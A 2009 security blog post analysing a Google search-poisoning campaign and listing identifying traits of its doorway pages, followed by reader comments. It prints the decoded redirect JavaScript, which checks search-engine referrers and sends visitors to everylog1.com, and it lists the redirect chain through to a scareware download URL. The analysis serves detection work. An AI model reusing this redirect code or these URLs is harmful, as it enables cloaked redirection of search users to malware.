Blog for hpHosts, and whatever else I feel like writing about ....

Sunday, 7 June 2009

Roguerific! aka: Don't worry Google, we can wait ....

Alas it seems, with all of the publicity and all of the reports that Google have been sent, they've still not been bothered to remove the malicious domains from their Google index, or the malicious blogs on their Blogspot service (and yes, I'm aware Google aren't the only company with these problems, but they're the most popular so at present, are seeing the most abuse).

I've been monitoring the Google results since my last report on the Google poisoning issue, and have been saddened to see not a reduction in the amount of malicious URL's in the index - but an increase.

Almost every single one for this variation (there are of course other variations) I've seen thus far has had identical properties that for a search engine with a spider as good as Googles, should be easy enough to identify and erradicate;

1. All URL's lead to a page with;

  1. a 2.js file
  2. jibberish in <pre></pre> tags and further such .htm pages linked to each other under neath (all pages linked to, have identical properties)
  3. ALL pages on the domain link to each other, with identical tags (and ONLY link to these pages) and link to the 2.js file
  4. ALL pages have title tags that have the name of the .htm file in them 3 times, for example;

    cadets.htm - cadets (cadets on the waterfront, yesterday tractor cub cadets)
    broderick.htm - broderick (terrace dining room broderick, lillian broderick)
    prototype.htm - prototype (vecto prototype board, what is a prototype lexical relation)
    sli.htm - sli (p5n32 sli installation, bfg 7950 gt sli
    achat.htm - achat (achat immobilier bons en chablais, centrale achat electrom nager)
    etc etc etc ....

    Full results for two of the domains, can be found at;

    http://hosts-file.net/misc/Google_Poisoning.txt

  5. All links are encased in <tt></tt> tags.


2. All pages are in sub-directories that have jibberishly named folder names
3. The 2.js file ALWAYS begins with eval(String.fromCharCode(
4. The decoded JS contains;

function f(){

var r=document.referrer,t="",q;

if(r.indexOf("google.")!=-1)t="q";

if(r.indexOf("msn.")!=-1)t="q";

if(r.indexOf("yahoo.")!=-1)t="p";

if(r.indexOf("altavista.")!=-1)t="q";

if(r.indexOf("aol.")!=-1)t="query";

if(r.indexOf("ask.")!=-1)t="q";

if(r.indexOf("comcast.")!=-1)t="q";

if(r.indexOf("bellsouth.")!=-1)t="string";

if(r.indexOf("netscape.")!=-1)t="query";

if(r.indexOf("mywebsearch.")!=-1)t="searchfor";

if(r.indexOf("peoplepc.")!=-1)t="q";

if(r.indexOf("starware.")!=-1)t="qry";

if(r.indexOf("earthlink.")!=-1)t="q";

if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1))

window.location = ("http://everylog1.com/in.cgi?9&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=default");

}
window.onFocus = f()


Obviously, the URL that window.location takes you to, differs (seems to change every few days to a week or so).

5. The 2.js files are the same size (3K), though different MD5's
6. The resulting URL that window.location takes you to, ALWAYS go through intermediares, but invariably leads to a rogue that contains the usual scareware content, which again, should be a piece of cake for Google's spider to identify.

In the case of eddierivera.com this is;
  1. everylog1.com/in.cgi?9&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=default
  2. everylog1.com/redirect2/
  3. homeandofficefun.com/go.php?id=2004&key=ff0057594&p=1 (Intermediary)
  4. antimalwareonlinescannerv3.com/1/?id=2004&smersh=b63db03e5&back=%3DDQ0zjD0NEQNMI%3DO (SCAREWARE PAGE)
  5. antimalwareonlinescannerv3.com/download.php?id=2004
  6. antimalwareonlinescannerv3.com/download/Setup-d2c79_02004.exe (PAYLOAD)

    VirusTotal: http://www.virustotal.com/analisis/6a4547ca8aa3634633a23ec4578ab4aa982f54deea263b672378b7b5896ba5b9-1244420368
    Threat Expert: http://www.threatexpert.com/report.aspx?md5=7d96921eebcc78ba717cfeb4e1dbdf3b

7. The folder containing the files almost always has an open index, presumably to improve SEO
8. The parent folder of the folder containing the files, also has an open index, and contains a file called "c", the contents of which, contain the folders name (the one in the Google index), and "200"

sierrahomesnw.com/nofqe/c
eddierivera.com/iyild/c

With a file called 1t, containing the .htm file names;

sierrahomesnw.com/nofqe/1t
eddierivera.com/iyild/1t

A 1r file, containing the file and folder names in the format "folder/file.htm"

eddierivera.com/iyild/1r.txt
sierrahomesnw.com/nofqe/1r.txt

And finally, a randomly named PHP file (8.7K), whose content has always been <ok>

sierrahomesnw.com/nofqe/rie.php
eddierivera.com/iyild/pal.php

On a side note, it appears the rogue domain in this case, only allows a max of 2 connections per IP, as subsequent attempts result in it's returning a 404 (checking via a proxy confirmed this). It's also worth noting that attempts to grab the executable directly, aren't going to work as the filename is partially static, and partially dynamic (Setup-{random}_02004.exe), I've grabbed 4 seperate files thus far.

9 comments:

Unknown said...

The tt tag is teletype, isn't it? Why would that be an indication that malware resides on the site?

MysteryFCM said...

It's not an indication of malware, just an identifer that can be used with the rest, to identify and flag the sites in question.

Unknown said...

I'm confused. You mean the tt tag is a "pre-qualifier" that would act as a filter for Google to know what sites need more evaluation?

MysteryFCM said...

Only when the other identifiers were present aswell. On it's own it means nothing.

Unknown said...

So items one through eight have to prevail for the site to be marked for further review?

Would it have to be all eight or a combination of some? If it were a combination, then I assume there would be some kind or priority ranking.

Would that review be done by a Google person or would it be automated?

MysteryFCM said...

In the case of this one, all identifiers would need to be present to prevent F/P's.

Ideally, reviews would be done by a human.

MysteryFCM said...

Expanding on this, if they automated it, their spider I assume, should be capable of the same functionality found in the likes of Wepawet, that would allow a sort of sandbox testing, which would then allow them to easily identify the site is trying to push an install via misleading means (combining the Wepawet functionality, with AV scanners for example, would identify the installers themselves, which would indicate a malicious site).

Unknown said...

No insult intended to your technical skills (and the MVP award attests to this . . . your technical skills are beyond question), but the Google guys are pretty sharp too.

So do you think they've not thought of this, or they have thought of it but the idea was rejected?

Or may it be just that the idea is stalled in the Google bureaucracy?

MysteryFCM said...

I've no doubt they'll have thought of it, or something similar. It's more likely it's either been rejected due to xyz, or it's still being kicked around/tested